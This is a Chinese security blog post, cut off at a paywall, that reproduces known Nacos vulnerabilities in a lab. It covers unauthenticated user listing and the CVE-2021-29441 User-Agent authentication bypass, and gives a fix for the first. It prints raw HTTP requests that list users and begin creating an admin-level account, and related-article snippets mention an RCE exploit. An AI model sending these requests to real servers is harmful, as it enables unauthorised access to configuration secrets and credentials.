Nacos历史漏洞复现(汇总)

最新推荐文章于 2025-04-17 11:12:44 发布
最新推荐文章于 2025-04-17 11:12:44 发布
阅读量7.4k 收藏 36
点赞数 33
分类专栏: web渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_55202378/article/details/141287014
版权

文章目录

一、权限绕过类

1.1 Nacos默认配置未授权访问漏洞——nacos.core.auth.enabled = false

漏洞原理:默认未开启配置nacos.core.auth.enabled

http://192.168.52.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
http://192.168.52.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken

在这里插入图片描述
在这里插入图片描述

修复方案:配置文件修改为:nacos.core.auth.enabled=True

1.2 Nacos 认证绕过漏洞(CVE-2021-29441)——User-Agent绕过鉴权

漏洞原理:配置文件中nacos.core.auth.enable.userAgentAuthWhite = true,就会获取请求头中UserAgent的值,然后判断是否是以字符串Nacos-Server为开头,若是则直接跳过鉴权。

影响版本:Nacos <= 2.0.0-ALPHA.1

使用Vulhub搭建好环境好,访问192.168.92.1/nacos/#/login,可以看到nacos的登录界面。
在这里插入图片描述
手动验证User-Agent: Nacos-Server
1、检测漏洞是否存在,可以看到返回值为200,且内容中是否包含pageItems(nacos中已注册的用户)

GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.92.1:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

在这里插入图片描述

2、添加新用户

POST /nacos/v1/auth/users?username=vulhub&password=vulhub HTTP/1.1
Ho
最低0.47元/天 解锁文章
2023年国家护网0day-poc/exp漏洞汇总(目前已更新到91个..实时更新中...)
08-21 4528
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
nacos漏洞汇总
潇逗
06-27 3712
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。指纹:app=“nacos”默认密码nacos nacos
漏洞复现Nacos rce-0day漏洞复现nacos 2.3.2)
lza20001103的博客
09-14 1746
漏洞复现Nacos rce-0day漏洞复现nacos 2.3.2)
nacos权限绕过及未授权访问(CVE-2021-29441)漏洞解决方案
最新发布
py_doc的博客
04-17 915
5.{nacos-server-2.0.0安装目录}\nacos\conf\application.properties,放开如下注释并按实际配置。2.创建mysql数据库,并初始化数据库,{nacos-server-2.0.0安装目录}\nacos\conf\nacos-mysql.sql。6.启动验证,访问http://ip:8848/nacos,默认用户名密码nacos/nacosnacos开启权限认证,如何配置,应用如何配置?7.nacos开启权限认证,如何配置,应用如何配置。
从0认识+识别+掌握nacos漏洞(攻防常见洞)带指纹表和利用工具
milu_Sec的博客
12-31 4813
还是按照之前的文章结构。
Nacos漏洞总结复现
heike_Ch的博客
04-23 1742
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
nacos漏洞小结
qq_61475980的博客
07-01 6286
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。在路径后面加上可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图更改提交方式为POST, 访问新建一个账号test111,可以看到创建用户成功,如图更改提交方式为DELETE, 访问可以看到用户删除成功,如图更改提交方式为。
vulhub之nacos
追风少年亚索的博客
11-20 1194
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
NACOS漏洞深入解析(审计+复现
qq_49849300的博客
03-27 5575
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
nacos漏洞复现
热门推荐
Scorpio_m7
02-09 1万+
????写在前面 ????博客主页:Scorpio_m7,github ????欢迎关注????点赞????收藏⭐️留言???? ????本文由 Scorpio_m7原创,优快云首发! ????首发时间:????2022年2月9日???? ✉️坚持和努力一定能换来诗与远方! ????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录????写在前面概述环境搭建Linuxwindows漏洞复现信息泄露任意用户创建使用Spring Boot获得账号及密码关键信息后台未授权登录 概述
Nacos系统历史CVE漏洞复现分析与检测
道阻且长,行则将至
02-07 4877
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞
Nacos身份认证漏洞
C_0010的博客
12-09 6583
Nacos身份认证漏洞,我们竟然2022年才发现!
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1551
JDK安装2023最完整教程与配置(零基础)
nacos系列漏洞复现总结
总有人间一两风,填我十万八千梦
09-05 8493
Nacos支持两种启动模式:单机模式和集群模式。
0-day预警-NACOS RCE-0day漏洞复现
Success696的博客
07-15 2863
配置config.py中的ip和端口,执行service.py。fofa语法: icon_hash=“13942501”ZoomEye语句:app:“Alibaba Nacos”执行exploit.py,输入地址和命令即可执行。下载nacos版本,项目地址。
sql自动生成工具_可自动生成代码,5款基于AI的开发工具
06-12
好的,针对您的问题,以下是基于AI的开发工具中的一些能够自动生成代码的工具: 1. DeepCode:DeepCode是一款基于AI的代码审查工具,它可以分析代码库并自动生成代码修复建议。它使用深度学习技术来理解代码结构和语法,并能够检测潜在的错误和漏洞。 2. Kite:Kite是一款基于AI的代码自动补全工具,它可以分析您正在编写的代码并提供自动补全建议。Kite使用机器学习算法来理解代码上下文,并能够为您提供高质量的代码片段和函数。 3. TabNine:TabNine是一款基于AI的代码自动补全工具,它可以根据您的输入自动生成代码。它使用机器学习技术来理解代码结构和语义,并能够为您提供高质量的代码片段和函数。 4. CodeAI:CodeAI是一款基于AI的代码自动生成工具,它可以根据您的需求生成高质量的代码。它使用深度学习技术来理解代码结构和语义,并能够为您提供高效、可读性强的代码。 5. Codeasy:Codeasy是一款基于AI的代码自动生成工具,它可以根据您的需求自动生成代码。它使用机器学习技术来理解代码结构和语法,并能够为您提供高效、可读性强的代码。 希望我的回答对您有所帮助。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值